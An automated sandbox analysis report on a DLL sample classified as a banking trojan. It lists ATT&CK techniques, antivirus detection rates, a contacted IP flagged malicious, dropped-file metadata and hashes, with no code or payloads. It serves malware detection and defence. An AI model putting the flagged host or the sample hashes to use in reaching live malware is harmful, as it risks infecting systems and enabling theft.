Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
37% | Virustotal | Browse | ||
31% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
l-0007.l-dc-msedge.net | 13.107.43.16 | true | true | | unknown |
a-0019.standard.a-msedge.net | 204.79.197.222 | true | false | | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
146.70.35.138 | unknown | United Kingdom | | 2018 | TENET-1ZA | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 613862 |
Start date and time: | 2022-04-22 15:25:25 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 32s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | HxEWwh74qT (renamed file extension from none to dll) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 41 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@28/29@0/2 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.43.16, 52.182.143.212
- Excluded domains from analysis (whitelisted): fp.msedge.net, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, ris.api.iris.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6304 because there are no executed function
- Not all processes were analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
15:26:45 | API Interceptor | |
15:26:53 | API Interceptor | |
15:27:31 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
146.70.35.138 | Get hash | malicious | Browse | ||
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
a-0019.standard.a-msedge.net | Get hash | malicious | Browse |
l-0007.l-dc-msedge.net | Get hash | malicious | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TENET-1ZA | Get hash | malicious | Browse |
⊘No context
⊘No context
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_2828325eddc3a9f8faabde465b0f08bdb67a44e_7cac0383_17ca004a\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8464047761659802 |
Encrypted: | false |
SSDEEP: | 96:85XB+F6wnYypy9haoKzfFEpXIQcQRc6+vcECAcw3p+a+z+HbHgiTAS/Y5ZU6h5P6:8pB+7nSHPKvBdjlq/u7sDS274ItW |
MD5: | B50C687C29BF44DAF94017951E1B1FA4 |
SHA1: | 035A1C3720BC2834F2EEA0B5C5C012FFCFA54D59 |
SHA-256: | 2B8D1BCCBD738DC93D23DB997E54B92B08D8E46F1DA33DA0159495779135CCD0 |
SHA-512: | 749ADFCD605FB1A481BD7387B9F447457050DE42C0F57139F9484EB263EE92A7451039AC45EF6E928D93B5D735FE058F194D1D43BEDE11862AB322AB284A97FA |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_82d8da601ff98714cf9338fbdd7f7aa4314182a_7cac0383_186e5281\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8494287362949074 |
Encrypted: | false |
SSDEEP: | 96:88XxGFrhPwnYyTy9haot7JnXpXIQcQac6pcEccw35+a+z+HbHgiTAS/Y5ZU6h5Pg:8c8hynSH0tGtjlq/u7syS274ItW |
MD5: | 25AA9B5977F4E6E9486A6B0AA7367E53 |
SHA1: | 49203D9B2C61AF1B0886A6DCF260AA93CA21B2BB |
SHA-256: | 83C38D8B07784190C93DD783EE9D288CE2522B878FC5082287770ADAE6C7C018 |
SHA-512: | 21BC08B3F8B1445C51C6C45A996D87811B58E18F55AC3DAD19DF5675AD7A82B4552F3FEB909001E92E4045AE9A84D5C23C857A613A3DF57B5A38813345F5559E |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_f73ca53a05f727fe3c280efd3588c9d22d24062_7cac0383_0d5dc489\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8429193116744815 |
Encrypted: | false |
SSDEEP: | 96:xqjA46wnYyNy9haoK7FISZpXIQcQac6pcEccw35+a+z+HbHgiTAS/Y5ZU6h5PMLv:xgnxH0tGtjlq/u7sDS274Itb |
MD5: | B662C448457F42C86FF6AE872E829F12 |
SHA1: | 6B760A764DFF5FEDE5A923E3953359ABE59BF098 |
SHA-256: | BCA2030589C0C03A6958D7A5A60968DDE5EF57E5FE4861A63A6EF3D687A1F6F0 |
SHA-512: | 963A1D9194D6E19BAA6017D869B19420FE20A2A8839A570E7B3B21EF9CF0337FFA35C32913BF72556B612D8FBCFFC096D197F5D7A9A557F35F641EA84B2809B1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 41334 |
Entropy (8bit): | 2.004648071633227 |
Encrypted: | false |
SSDEEP: | 192:A854coHsADYmaZyZOGKWtP75TTmlZRCXL5CpVfS:A4yshxbGttP75TinRCXFCS |
MD5: | 045591FB9A51E43D170A2F09CC3DADC1 |
SHA1: | 81CF74B064211B7258D207E5E299206175584D6D |
SHA-256: | AC3064CB253A5F508A4883613F1FA63A694AE5572B5D22F80E4F38375E533FD2 |
SHA-512: | D100B85B0237B4D327966B3F7B19E55FBAC7ABBA83C6C7D1262EF07F68D10B8E5D9B1E08B25C9EA5A31875E220DA022555AA87F0C4AB4126213DBAC6BA620449 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8356 |
Entropy (8bit): | 3.6933010429084745 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNitC66q06YpoSU5zgmflSQCpNP89b571fHTm:RrlsNio686YWSU5zgmflSu5Jfq |
MD5: | 0DB5E90F9A50EBD43F3DF77C0DA85950 |
SHA1: | B4EB81ABFEDA2C5FCF0A3F8D04F78B19BFB1BF70 |
SHA-256: | 833B8C530A023BD671DDD8012AA17D0C0F15F255008D3C946443CCE66ADC0BFF |
SHA-512: | 3839036F675F9945C835F7E058C20ECF6191E7FC1A654899335ED4B3FC8D081556890C5509E7EFF953E743CA2975C1019517564FB3F9EE36432A362698E287C5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4665 |
Entropy (8bit): | 4.431687079649683 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsIJgtWI92gWgc8sqYjhq8fm8M4J2+AFpdW+q8vQ+CKcQIcQw0ld:uITfOxZgrsqY1fJBKmKkw0ld |
MD5: | 1DBFF782298A0B63A1CC9CDF1DF61976 |
SHA1: | 3024D4229EEE1DFBB8E000183F6CDFAC66732407 |
SHA-256: | 6BC464DB5E86A06C79A21B34035437175F2C1D128EE0DCE7DC01D45E2E1CD1D8 |
SHA-512: | EF28376A35433F6278CA36321C4DA9F000AAC8DAB3BD9EA7A829D1B65F81BCCD88528442B9CDAD2EE707C5B2E44FF663A62C4BB249417C1686E9B1BC276F0FE4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 41134 |
Entropy (8bit): | 1.975058856907694 |
Encrypted: | false |
SSDEEP: | 192:+5mcXsADYmaM3IdOGKWhi075TTxZ6Tpdy2FjrFJDq:evshcGtQ075TH6Tpvq |
MD5: | 2001588067FFF81F56C55A45CFC8D00C |
SHA1: | FCC83C72DF6A50E9E5A0B2EE60D4AF17CAFF3F79 |
SHA-256: | 6F54FE4171D5D68F0FBDCC4AAE1C49EA13E04D8A592EDDE299D97232536071EB |
SHA-512: | 4F7C5711FC707A734BEE855473D6EABFEB555166F537BBEBFBDB7503BF8844E38A589AAE5BE29C9769DDD9181252F807FEEA58C56E5410AEF18287576118DE24 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8340 |
Entropy (8bit): | 3.69963560991601 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNit06nfq06YprSUYWgmfcSQCprk89bFzsfsXm:RrlsNie6x6YFSUYWgmfcSZFYfB |
MD5: | 516269548DB5CE174DADC69DEBA1EB5C |
SHA1: | 11FAF3721AA9894B5591B1BCE04F5F72D2DC8DE4 |
SHA-256: | E9EF7AB53DF211C4A0A1D12C6E5A073BF1F9702B1A6EBE440E9C23BCA2565AC6 |
SHA-512: | 2139A4ED0CB86BAACA05655D9D074F36C99E7F75B523FDC9CFAE55742F13958D2D3E34A44D1FDF05764FA21ECCC19F08AAD006CC13DCBA4592C987D8E0E52604 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.471806474905488 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsIJgtWI92gWgc8sqYjhF8fm8M4J2+hZFRb+q849krKcQIcQw0kd:uITfOxZgrsqY1yJbdbarKkw0kd |
MD5: | DED0973B6E25A0EFCBA8347616282B2D |
SHA1: | 488F0BA05EEBD3FD6F3234A170074152C02906B3 |
SHA-256: | 358350ADB96A3F7620569B6C9551773225FC09060ED4C99FFC5F3E2BC6FF9AC3 |
SHA-512: | 2103F5C5D1021053BB37E577665D57B4961B33881BBC084F2E881C358AEF87395A55FCDE151E785922BE39066AE97A0A5E29EEC3B9BFF88F9F2A5127972B76A5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 54158 |
Entropy (8bit): | 2.188437702004145 |
Encrypted: | false |
SSDEEP: | 192:v5FcMhsADYmaNnOGKWSV+hHTpg0DAKwZhbvB5isF7h75TT+nZPnnTlODfE9zsQ:xxsh4GtjhjAKwZhbziwV75TaZPnhsQ |
MD5: | 8C90697300310A9955BFECD8FBE19128 |
SHA1: | 89ECCBCAF68529209F03D80BB216F6AB2E42020D |
SHA-256: | B47100BC6B1B609C64B3ACE915F911B109B86CE453B7A16B0884763B01B5ADB8 |
SHA-512: | AAEFEB710D9ACD68122BD0844F854B9B77E00618ED321759257D2228C7F648D9065E131F4259E3D78F9B4604A7B8A0F5D0AF50615F45747E1BC68045E50655AB |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8294 |
Entropy (8bit): | 3.696774268699421 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNitQ67q06YpbSUGmgmfqSJ7CpD989bFLzsf8fzm:RrlsNia616Y1SUGmgmfqSJxFLYfMq |
MD5: | 62B8619A4E1DEEB3CFE96784DC7BCE24 |
SHA1: | 7B61FB3B1F695606412A6DA9E26671521D321E0D |
SHA-256: | A5988942CA222FF850B4FFBEA7BE18868602C422ABFCA475C81EBAAC33718685 |
SHA-512: | AA5091E3E6A2D713E1D0C0473B38220990ED51190061251FE44C791EF70FA8189FEF2F119990E92C5B49CC59F0138587FBD48A22D4A21AD8B48A99BABEDD6D7D |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4564 |
Entropy (8bit): | 4.4450578324351975 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsIJgtWI92gWgc8sqYjhj8fm8M4J2+bF4+q84CPKcQIcQw0kd:uITfOxZgrsqY1gJocKkw0kd |
MD5: | 94F0237F61D6A72BF9FD262D5DAF1CB8 |
SHA1: | 77BA53C28A3D168D892F2D06300803EC5CF62C34 |
SHA-256: | 0A82D2F9FA529CEBB573FD7A8D54A1EE0C689179A013A2B1AA5C3F6E7F333A79 |
SHA-512: | D3F0BD47566C109A1DC34A0128DDBD00B4C61C99A3DAD26A29CD182AACA889854305F960FF503BCA681E097273D18372BCE4D380B2F3ED718C0AAFD1D207EBE5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
MD5: | 243581397F734487BD471C04FB57EA44 |
SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.9260988789684415 |
Encrypted: | false |
SSDEEP: | 3:Nlllulb/lj:NllUb/l |
MD5: | 13AF6BE1CB30E2FB779EA728EE0A6D67 |
SHA1: | F33581AC2C60B1F02C978D14DC220DCE57CC9562 |
SHA-256: | 168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F |
SHA-512: | 1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1336 |
Entropy (8bit): | 4.0070959147380645 |
Encrypted: | false |
SSDEEP: | 24:HJm9ZLo1c8ZH+hKdNwI+ycuZhNwakScPNnq9Sd:uSrZ0Kdm1ulwa3Mq9C |
MD5: | 0207AEB635BFA2BFB793AA26D45D28BC |
SHA1: | EFC69E173AB42B6B1AF939C8BE54DC73301AC851 |
SHA-256: | C94D40766F2B91F22AD5E55BA35D947AE2825F5B9A34E0ECE134B0A86ECCE5AF |
SHA-512: | B11F2E0DFE55984263E6BA60EE1B95E6D07588F64435CD4EF2D972A41819E37AB5DCBE268671C67D7D4ADDC6EEF99FC31CE1162BFAD35D68B71E8F3400B45777 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1336 |
Entropy (8bit): | 4.01926801632089 |
Encrypted: | false |
SSDEEP: | 24:Hbm9ZM+IZHUhKdNwI+ycuZhNUsvakSfsIPNnq9Sd:QeZGKdm1ul/a3jq9C |
MD5: | 79C2F50A254E8807286FA0F3634DCDAA |
SHA1: | 3ED67CB1DE55A3B1B93CBD8510385B9608F4F624 |
SHA-256: | 983C6748597DC864F47D16C32EAAA59C226FBE8DF3ADCC37C48640A59BAD0C93 |
SHA-512: | 7AE7FA180A5A95550FD00DA6B9AF07FD777251B713683B66512C6DE624BB823C9B6D0A99DF8678A9006EE87B8C9244C974B945D135FA1433384649AB175836CF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.087313141948283 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWlklqqak7YnqqFlklqbPN5Dlq5J:+RI+ycuZhNUsvakSfsIPNnqX |
MD5: | 3D9C89F9813A7154E8FB79DA7D10E8B2 |
SHA1: | 4E2EA7F78C62941F644D9F1FAD64D127E31306CE |
SHA-256: | B76B5C81AFE17B214527AC8DCD85285CED0102DC6164A4304188B5D4D4E69239 |
SHA-512: | 72123D606437DA61F2D52D44E329F6CD0E9CB6CD86A3739436F54889D0972FBA14EFB814D244B2A2CEBA34730E6B2C15226A5403BE8C0F7886D396A3021FCA9F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 417 |
Entropy (8bit): | 5.038440975503667 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny |
MD5: | AE91D1351B9FB773FEF9B6F31D0A22EE |
SHA1: | 323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31 |
SHA-256: | 2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD |
SHA-512: | 94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 377 |
Entropy (8bit): | 5.245551465598388 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fQ+b0zxs7+AEszIcNwi23fQ+CWH:p37Lvkmb6KwZ4+wWZEJZ4+VH |
MD5: | 657DF5DBF2CD40C8427224A737044E8C |
SHA1: | 9BB8F1884A4BF325B5E07D3874D7CB7CD163A047 |
SHA-256: | 47A5E44ED29C7B102C323480B9BFB1992012E17C84BD7C5A601E3AADC9690BCA |
SHA-512: | 60404977E8335B653914ADE5B6B9506714E2855F31A4F9E046898D7A66480CAC4631D851061911B309E6AFBF0EBFA8539D1417E00861D8F25C21AF6AF6E4FDFF |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.643829505456859 |
Encrypted: | false |
SSDEEP: | 24:etGSDeMWWOJy853Ek0s2E7Og1odWQzbtkZfdFwT/OWI+ycuZhNUsvakSfsIPNnq:6svz5UkGE7vsWQzqJ/a11ul/a3jq |
MD5: | 010A7FEF0AA253BE01A7D57105104C99 |
SHA1: | EC3146FF9E8A4218C2D14CE70863692B953A751E |
SHA-256: | B291831CDE532E047D0BBDB58CEFA9AAF938BEFE3F2FDF3762F7F7387A134DD5 |
SHA-512: | C5B8B280D4D696424FBB02582992513EFA5186E4DCBABB2E2057439178330A8857A0DF3172F054FC8CB94966182FAFA6F813A979871E3A8E44FB21350D4268D5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 874 |
Entropy (8bit): | 5.323639412262709 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KgvEvbOKaM5DqBVKVrdFAMBJTH:Akka67vEvCKxDcVKdBJj |
MD5: | 77A926519D8FA89DF6F5D0C77E79D0A3 |
SHA1: | 7912DA6B9435D7AF26FA649341CB5E0124EA8FC3 |
SHA-256: | 452BD2C2631FDB744B80E6DD5A033C45548FE8733869C2F9F41110A529F1F9B0 |
SHA-512: | 40D9D3C5443AD37475C6F9A3B5E1E4C784B44AA664DE62EA10A0B6011657DFF2A2AA5B9846B58B1A75277E747406A42BB7DDCD99A67ECB23FDB82D1CBB225BBA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1048977846809547 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryMbak7Ynqq/UPN5Dlq5J:+RI+ycuZhNwakScPNnqX |
MD5: | E2051F8A521B2F3B00C715BD57DCCC78 |
SHA1: | 667FC3B5ED67494166B61D57050519DA3C24C9EC |
SHA-256: | 9FC45C88A9D75B6A1856480057CACF18B668C8C61992A417C1FB48EB0C4381F1 |
SHA-512: | 9C0585D9186601C0497179607893F845DABBFFFB8BE8453162BD9435CB1F6F9030CE01F1A16ADE1E79FBC01DF4B16CD3913EB4A39DA0F391CC0B06D92A8A1F89 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 411 |
Entropy (8bit): | 5.082169696837192 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy |
MD5: | 248E15CD19191D4333303E0E1F8E9A70 |
SHA1: | 9896EF9708F81AE4E3F2CA86329AD6BD82C700C3 |
SHA-256: | 0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF |
SHA-512: | 8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 377 |
Entropy (8bit): | 5.2338402577992165 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fDSZ++zxs7+AEszIcNwi23fDSZE:p37Lvkmb6KwZLYWZEJZLV |
MD5: | 23922C7400B5639004534C21A8FC6FD9 |
SHA1: | EFC910B97F452FB59BF063CB331136BF7B5EE364 |
SHA-256: | 65423661DBE57376B2BFEE4E014394645B6A2C67FC8C71C9F9196D586FBBAE09 |
SHA-512: | 557EF63D5E3B0D3228229F28E76BADE02AC8844BAE6AA0D67C987A459C1D9B7430283C6AAFD98B56701993112344740A7BF128ECD2FD9E061A0C54C968650AA1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6392294884325143 |
Encrypted: | false |
SSDEEP: | 24:etGSc8+mUE7R853RY0kCG++4I4tkZfcuDZ0WI+ycuZhNwakScPNnq:6GXE7S50/JcYZX1ulwa3Mq |
MD5: | DF0CED5409923E601543A19300A5F2C0 |
SHA1: | B5055B13C52F28A7AC23A4DC6F1BC7058B50EA16 |
SHA-256: | 95927D387C19566BAF533827449CDAF0EB132DF3DFF1F500ECCDDB1DAEC9313D |
SHA-512: | 4F64BBE5A0E84FF07B70A07DCF97C58BC444B42800C4479E33F8424E6A8C3DA137AEA4E3F62D1991CD86B452840BEFDBC49013949082295D131875AEC65A0455 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 874 |
Entropy (8bit): | 5.318135012806756 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KgLpEvLwKaM5DqBVKVrdFAMBJTH:Akka67FEvEKxDcVKdBJj |
MD5: | 1057CD175F0A0ED38ECEADB83BD825CC |
SHA1: | 1510C0179E5FC3A55FB866668781A6CF04B43611 |
SHA-256: | 2CC8FD12A44EEFECF8ED908C4EE2C450036626C87C13A238A7F560E1891A528C |
SHA-512: | 748F36E9A2484DC0413481447CB1325365F7DCE121E208AB2ED48ADF4282D18975FD66700E421AC6CEA98CD2A424AA71A3AADC956330DE4EC648356684B03435 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220422\PowerShell_transcript.910646.1Eiln6hD.20220422152728.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1371 |
Entropy (8bit): | 5.404148001284477 |
Encrypted: | false |
SSDEEP: | 24:BxSAGdZOvBdaQx2DOXUWZJ/t+LCHt4qW4HjeTKKjX4CIym1ZJX0J/t+LCHt4gnxf:BZ9v6QoOFht4t4qDYB1Zaht4eZZcC |
MD5: | 0B43799452C644E51F9DD4EF713574B6 |
SHA1: | 70329EFE7607D70C080CE16FE4CB78592B878CED |
SHA-256: | 134FFA52B0570D604C1799C9CBB7AD9F2CD2B4154DD6166D79176D53A8C4BD58 |
SHA-512: | 1829C6541D3DAD2E8BF85716238A6B4251AAC6166E1FE122B0E43643FAF772B03DE20C3B244F50EA102E2CBBF4C67B004E82C4F0421705521A499885FCF18E5D |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.10709348833746 |
TrID: |
|
File name: | HxEWwh74qT.dll |
File size: | 639303 |
MD5: | 5d2b5cbd8a574c9e35309e21ecf93a0e |
SHA1: | c15e583e28556f5d187197937b4d2a715ebf8ca7 |
SHA256: | 52d14c9cd56aa41ba98a24a4a3dc3674f7e281c3d79f6aca141382fb56585bcd |
